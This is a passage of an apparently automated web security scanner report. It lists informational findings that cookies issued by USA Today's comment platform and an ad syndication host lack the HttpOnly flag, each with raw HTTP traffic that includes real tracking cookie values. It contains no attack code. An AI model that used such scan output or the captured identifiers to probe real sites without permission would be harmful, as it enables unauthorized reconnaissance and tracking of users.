The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 85
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:57 GMT
Connection: close


11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 378
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close


11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 606
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close


11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 618
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close


11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/checkplayer.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flXHR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flXHR.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:08 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flensed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flensed.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/swfobject.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1304955414035 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close


11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/content/ua/css/pluckAll.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/ua/css/pluckAll.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24
If-None-Match: "dfe75b1623ecc1:2af"
If-Modified-Since: Mon, 09 May 2011 08:28:34 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:01 GMT
Etag: "dfe75b1623ecc1:2af"
Connection: close


11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "4889D0CFAF8896B1003B735074638083"
Content-Type: text/html


11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "3CCDE5EE851A7D416FF8A4E14DAD9DB7"
Content-Type: text/html


11.103. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:00 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
